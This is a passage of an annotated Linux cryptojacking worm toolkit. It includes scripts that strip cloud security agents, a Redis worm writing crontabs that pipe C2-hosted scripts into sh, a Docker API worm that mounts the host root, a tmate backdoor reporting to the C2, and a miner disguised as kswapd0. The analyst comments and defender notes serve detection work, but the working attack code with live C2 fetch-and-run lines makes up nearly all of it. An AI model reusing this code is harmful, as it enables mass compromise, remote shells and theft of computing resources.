rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
elif ps aux | grep -i '[y]unjing'; then
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
fi
sleep 1
echo "DER Uninstalled"
# Build masscan 1.0.4 from a tarball served by the C2 (fetched with the
# renamed curl), installing it system-wide.
if ! [ -x "$(command -v masscan)" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
sleep 1
$bbdira -sL -o x1.tar.gz http://oracle.zzhreceive.top/b2f628fff19fda999999999/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
echo "Masscan Installed"
fi
echo "Masscan Already Installed"
# Releases the .watch lock taken earlier in this script.
sleep 3 && rm -rf .watch
# Build pnscan from p.tar the same way.
if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then
$bbdira -sL -o .x112 http://oracle.zzhreceive.top/b2f628/p.tar || $ccdira -q -O .x112 http://oracle.zzhreceive.top/b2f628/p.tar
sleep 1
[ -f .x112 ] && tar xf .x112&& cd pnscan && ./configure && make && make install && cd .. && rm -rf pnscan .x112
echo "Pnscan Installed"
fi
echo "Pnscan Already Installed"
# If a Docker daemon is listening on 2375 (the port this family's own
# scanner targets), rewrite 2375 -> 2275 in the docker unit file reported by
# "systemctl status" and restart Docker -- presumably to close the door
# used for entry so that other attackers cannot follow.
# Defender notes: a Docker API moved to an unusual port after an intrusion is
# an artefact worth checking in docker.service.
systemctl status docker
ps -ef|grep 2375|grep -v grep
if [ $? -ne 0 ]
then
echo "docker not start"
else
for config in $(systemctl status docker|grep docker.service|grep -i load|awk -F "(" '{print $2}'|awk -F ';' '{print $1}'); do sed -i 's/2375/2275/g' $config && systemctl daemon-reload && systemctl restart docker; done
fi
# Chain to cronscan (listed above), with curl and with the renamed copy.
$bbdir -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash
$bbdira -fsSL http://oracle.zzhreceive.top/b2f628/cronscan | bash
scan
# /usr/shared/[scan]
#!/bin/bash
# /usr/share/[scan], run by scan.service. Same preamble as cronsh.sh:
# SELinux permissive, raised process limit, and INPUT rules that let only
# localhost reach Redis on 6379.
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
#######################################
# Same function as in cronsh.sh: removes the execute bit from and sets the
# immutable attribute on common diagnostic tools (pstree, kill, netstat, ss,
# lsof, ...), then sets the immutable attribute recursively on .ssh
# directories, passwd, shadow, sudoers and the sshd config. Not called within
# this script as captured. "tntrecht" is presumably a renamed chattr
# (not visible in this excerpt).
# Defender notes: "chattr -i" is required before any of these files can be
# repaired; "lsattr" on /etc and /usr/bin reveals the attributes.
#######################################
function SecureTheSystem(){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsof wget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=`which $SYSFILE` 2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
done
}
sleep 1
# Identical to the scanner body of cronsh.sh: skip if a pnscan process is
# already visible (via /bin/ps.original when present), otherwise build the
# Redis command file .dat and scan for open Redis servers.
if [ -f "/bin/ps.original" ]
then
ps.original -fe|grep pnscan |grep -v grep
else
ps -fe|grep pnscan |grep -v grep
fi
if [ $? -ne 0 ]
then
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
# Redis commands that turn an unauthenticated, root-run Redis into a cron
# writer: CONFIG SET dir/dbfilename aim the RDB dump at
# /var/spool/cron/root, /var/spool/cron/crontabs/root, /etc/cron.d/zzh and
# /etc/crontab, and SAVE writes a database whose only keys are crontab lines
# re-fetching b.sh every 2-5 minutes. "flushall" wipes the victim's data.
# Mitigations: bind Redis to localhost, require a password, run it as an
# unprivileged user, and rename or disable CONFIG.
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'config set stop-writes-on-bgsave-error no' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/etc/cron.d/"' >> .dat
echo 'config set dbfilename "zzh"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/etc/"' >> .dat
echo 'config set dbfilename "crontab"' >> .dat
echo 'save' >> .dat
sleep 1
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
# Endless pnscan sweep of shuffled /16s on tcp/6379; -W sends the RESP
# "INFO" command and -R keeps responses containing "os:Linux". Each hit is
# fed .dat via a backgrounded redis-cli. Because this loop never exits, the
# masscan stages below are not reached in this version.
# Defender notes: persistent pnscan process, floods of outbound SYNs to
# 6379, and .r.<x>.<y>.o/.l files in the working directory.
while true; do
for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw &
done < .r.$x.$y.l
done
done
done
sleep 1
# masscan stages (random shard of 0.0.0.0/0, fixed /16s, local subnets).
masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
sleep 1
masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null
else
echo "root runing....."
fi
mate
# /usr/shared/[mate]
#!/bin/bash
# /usr/share/[mate], run by mate.service (Restart=always): the tmate
# backdoor as a persistent service. Unlike the tmt() function in cronb.sh,
# the session token is cached in /var/tmp/.rundom so the operator's session
# name stays stable across restarts, and tmate runs in the foreground (the
# unit keeps it alive).
# Defender notes: /var/tmp/.rundom, /tmp/tmate, /tmp/.tmbd and outbound
# traffic from a "tmate -F -k" process are the indicators.
mkdir -p /var/tmp/ 2>/dev/null
chattr -ia / /var/ /var/tmp/ 2>/dev/null
if [ ! -f "/tmp/tmate" ]; then wget http://bbq.zzhreceive.top/tmate -O /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then curl http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then cd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then wd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
chmod +x /tmp/tmate
if [ -f "/var/tmp/.rundom" ]
then
URLTOKEN=$(cat /var/tmp/.rundom)
else
URLTOKEN=$(awk 'BEGIN{srand();print rand()*1000000}')"O"$RANDOM
echo $URLTOKEN >/var/tmp/.rundom
fi
# Report the session name to the C2 with every available fetcher.
curl http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wget http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
cd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
/tmp/tmate -F -k tmk-Ta5vTFHKJWn1dhlYVnWoBYmJ8c -n $URLTOKEN >/tmp/.tmbd
[mass]
# /usr/shared/[mass]
#!/bin/bash
# /usr/share/[mass], run by mass.service: Docker Remote API worm. This
# prologue selects fetchers, sizes the scan rate by RAM, installs masscan,
# zgrab, jq and docker, and prints a banner. The scan itself is dAPIpwn
# below.
# Defender notes: expect masscan and zgrab processes, /usr/bin/zgrab and
# /usr/bin/jq dropped from the C2, and a Docker client installed on a host
# that never needed one.
if [ -f /bin/cd1 ];then
aabb=/bin/cd1
echo "cd1 exist"
elif [ -f /bin/curl ];then
aabb=/bin/curl
echo "curl exist"
else
echo "curl not exist,use yum reinstall"
yum -y remove curl&&yum -y install curl
fi
if [ -f /bin/wd1 ];then
ccdd=/bin/wd1
echo "wd1 exist"
elif [ -f /bin/wget ];then
ccdd=/bin/wget
echo "wget exist"
else
echo "wget not exist,use yum reinstall"
yum -y remove wget&&yum -y install wget
fi
# MemTotal in whole GB -> masscan packet rate (1000 for <=2 GB up to 20000).
RATE_TO_SCAN=$(cat /proc/meminfo |grep MemTotal|awk '{print $2/1024/1024}'|awk -F "." '{print $1}')
if (("$RATE_TO_SCAN"<=2 )); then
RATE_TO_SCAN=1000
elif (("$RATE_TO_SCAN"<=4)); then
RATE_TO_SCAN=2000
elif (("$RATE_TO_SCAN"<=8)); then
RATE_TO_SCAN=5000
elif (("$RATE_TO_SCAN"<=16)); then
RATE_TO_SCAN=20000
elif (("$RATE_TO_SCAN"<=32)); then
RATE_TO_SCAN=20000
elif (("$RATE_TO_SCAN"<=64)); then
RATE_TO_SCAN=20000
elif (("$RATE_TO_SCAN">64)); then
RATE_TO_SCAN=20000
else
echo other
fi
# Dependencies: distro packages, then zgrab/jq binaries from the C2 and
# Docker from get.docker.com (curl -k: TLS verification disabled).
if type apt-get 2>/dev/null 1>/dev/null; then apt-get update --fix-missing 2>/dev/null 1>/dev/null; apt-get install -y wget curl jq bash masscan libpcap-dev ; fi
if type yum 2>/dev/null 1>/dev/null; then yum clean all 2>/dev/null 1>/dev/null; yum install -y wget curl jq bash masscan libpcap-devel ; fi
if ! type zgrab 2>/dev/null 1>/dev/null; then $ccdd http://bbq.zzhreceive.top/zgrab -O /usr/bin/zgrab && chmod +x /usr/bin/zgrab ; fi
if ! type jq 2>/dev/null 1>/dev/null; then $ccdd http://bbq.zzhreceive.top/jq -O /usr/bin/jq && chmod +x /usr/bin/jq ; fi
if ! type docker 2>/dev/null; then $aabb -sLk https://get.docker.com | bash ; fi
if ! type masscan 2>/dev/null 1>/dev/null; then yum -y install epel-release && yum clean all && yum -y install masscan ; fi
clear ; echo "" ; echo ""
# Base64 of what appears to be an ASCII-art banner (whitespace and box
# characters only); output only.
echo CgoKICAgICAgICBfX19fXyAgICAgICAgICAgICAgICAgICAgX19fX18gICAgX18gIF9fX19fICAgXyBfIF8gICAgICAgICAgICAgIAogICAgICAgL19fICAgXF9fXyAgX18gXyBfIF9fIF9fXy9fXyAgIFwvXCBcIFwvX18gICBcIHwgKF8pIHwgX19fX18gIF9fXyAgCiAgICAgICAgIC8gL1wvIF8gXC8gX2AgfCAnXyBgIF8gXCAvIC9cLyAgXC8gLyAgLyAvXC8gfCB8IHwgfC8gLyBfIFwvIF9ffCAKICAgICAgICAvIC8gfCAgX18vIChffCB8IHwgfCB8IHwgLyAvIC8gL1wgIC8gIC8gLyAgICB8IHwgfCAgIDwgIF9fL1xfXyBcIAogICAgICAgIFwvICAgXF9fX3xcX18sX3xffCB8X3wgfF9cLyAgXF9cIFwvICAgXC8gICAgIHxffF98X3xcX1xfX198fF9fXy8gCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIF8gICBfICAgICAgICAgICAgICBfX18gIF9fXyAgICBfXyAgICBfX18gICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICB8IHxffCB8X18gICBfX18gICAgLyBfX1wvIF8gXCAgL19fXCAgLyBfIFwgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgIHwgX198ICdfIFwgLyBfIFwgIC9fX1wvLyB8IHwgfC8gXC8vIC8gL19cLyAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgfCB8X3wgfCB8IHwgIF9fLyAvIFwvICBcIHxffCAvIF8gIFwvIC9fXFwgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgXF9ffF98IHxffFxfX198IFxfX19fXy9cX19fL1wvIFxfL1xfX19fLyAgICAgICAgICAgICAgICAgCgoKCgoK | base64 -d
sleep 6
# CentOS major version from /etc/redhat-release; on anything that is not
# detected as 7 a libpcap.so symlink is created for masscan.
version=$(cat /etc/redhat-release |awk '{print $4}'|awk -F "." '{print $1}')
if ( "$version" -eq 7 ); then
echo "system release centos 7"
else
echo "system release centos 8" && ln -s /usr/lib64/libpcap.so.1 /usr/lib64/libpcap.so
fi
chmod +x /usr/bin/zgrab
#######################################
# Scan one range for unauthenticated Docker Remote API endpoints and
# infect them.
# Arguments: $1 - CIDR range; $2 - port (2375 or 2376 from the caller);
#            $3 - masscan rate.
# masscan finds open ports, zgrab requests /v1.16/version on each, and jq
# keeps the IPs whose reply contains ApiVersion. The result list is stored
# under a randomly named variable via eval (the name is six random letters;
# presumably to make the variable hard to predict, though this is only a
# guess). For each hit: report the target to the C2, then use the victim's
# own Docker API to run an alpine container with the host root filesystem
# mounted at /mnt and chroot into it, writing cron entries that fetch
# cronb.sh every minute into /etc/crontab and /etc/cron.d/zzh.
# Defender notes: an exposed Docker API without TLS client auth is
# equivalent to root on the host, which this shows concretely. Mitigations
# are to not bind dockerd on tcp, or to require mutual TLS; detection is a
# "docker run ... -v /:/mnt ... chroot /mnt" event in the daemon's audit
# log, and the two cron files named above on the victim.
#######################################
dAPIpwn(){
range=$1
port=$2
rate=$3
rndstr=$(head /dev/urandom | tr -dc a-z | head -c 6 ; echo '')
eval "$rndstr"="'$(masscan $range -p$port --rate=$rate | awk '{print $6}'| zgrab --senders 200 --port $port --http='/v1.16/version' --output-file=- 2>/dev/null | grep -E 'ApiVersion|client version 1.16' | jq -r .ip)'";
for ipaddy in ${!rndstr}
do
TARGET=$ipaddy:$port
echo '##################################################'
# Telemetry: victim address sent to the operator's collector.
$aabb -sLk http://107.189.3.150/input/da.php?vuln=$TARGET -o /dev/null
echo $TARGET
timeout -s SIGKILL 240 docker -H $TARGET run --rm -v /:/mnt alpine chroot /mnt/ /bin/sh -c "if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y --reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/crontab && echo \"* * * * * root curl http://107.189.3.150/b2f628/cronb.sh|bash\">/etc/cron.d/zzh"
done
}
# Endless loop over shuffled /8 ranges (first octet 0-225), scanning both
# Docker API ports with the RAM-derived rate. The commented-out line shows
# an earlier, narrower list of first octets.
while true; do
#for RANGE in $( echo -e "47\n39\n8\n121\n106\n120\n123\n101\n139\n81\n44\n119\n100\n42\n49\n118\n1\n114\n112\n115\n111\n116\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113" | sort -R ); do
for RANGE in $( seq 0 225 | sort -R ); do
dAPIpwn $RANGE".0.0.0/8" 2375 $RATE_TO_SCAN
dAPIpwn $RANGE".0.0.0/8" 2376 $RATE_TO_SCAN
done
done
mate
# /usr/shared/[mate]
#!/bin/bash
# /usr/share/[mate] (repeated listing): tmate backdoor run as a service.
# Downloads tmate to /tmp/tmate with the first working fetcher, reuses or
# creates a session token in /var/tmp/.rundom, reports it to the C2 under
# /address/<token>, and runs tmate in the foreground with the operator's
# API key so mate.service keeps it alive.
# Defender notes: /tmp/tmate, /tmp/.tmbd, /var/tmp/.rundom and a long-lived
# "tmate -F -k" process.
mkdir -p /var/tmp/ 2>/dev/null
chattr -ia / /var/ /var/tmp/ 2>/dev/null
if [ ! -f "/tmp/tmate" ]; then wget http://bbq.zzhreceive.top/tmate -O /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then curl http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then cd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then wd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
chmod +x /tmp/tmate
if [ -f "/var/tmp/.rundom" ]
then
URLTOKEN=$(cat /var/tmp/.rundom)
else
URLTOKEN=$(awk 'BEGIN{srand();print rand()*1000000}')"O"$RANDOM
echo $URLTOKEN >/var/tmp/.rundom
fi
curl http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wget http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
cd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
/tmp/tmate -F -k tmk-Ta5vTFHKJWn1dhlYVnWoBYmJ8c -n $URLTOKEN >/tmp/.tmbd
kswapd0_service
# abc
# /etc/systemd/system/kswapd0.service
# The unit file as recovered from the infected host. It is the one written
# by SetupMoneroOcean in cronb.sh with $MOHOME expanded to
# /var/tmp/.copydie. The name and Description imitate the kernel's swap
# daemon; Nice=10 and CPUWeight=1 keep the miner at low priority, which is
# why it showed up as "ni" time rather than a top process.
# Defender notes: "systemctl list-unit-files | grep kswapd0" and the
# ExecStart path below are the quickest checks; a genuine kswapd0 is a
# kernel thread and never has a unit file or an on-disk binary.
[Unit]
Description=kswapd0 system service
[Service]
ExecStart=/var/tmp/.copydie/[kswapd0] --config=/var/tmp/.copydie/[kswapd0].pid
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target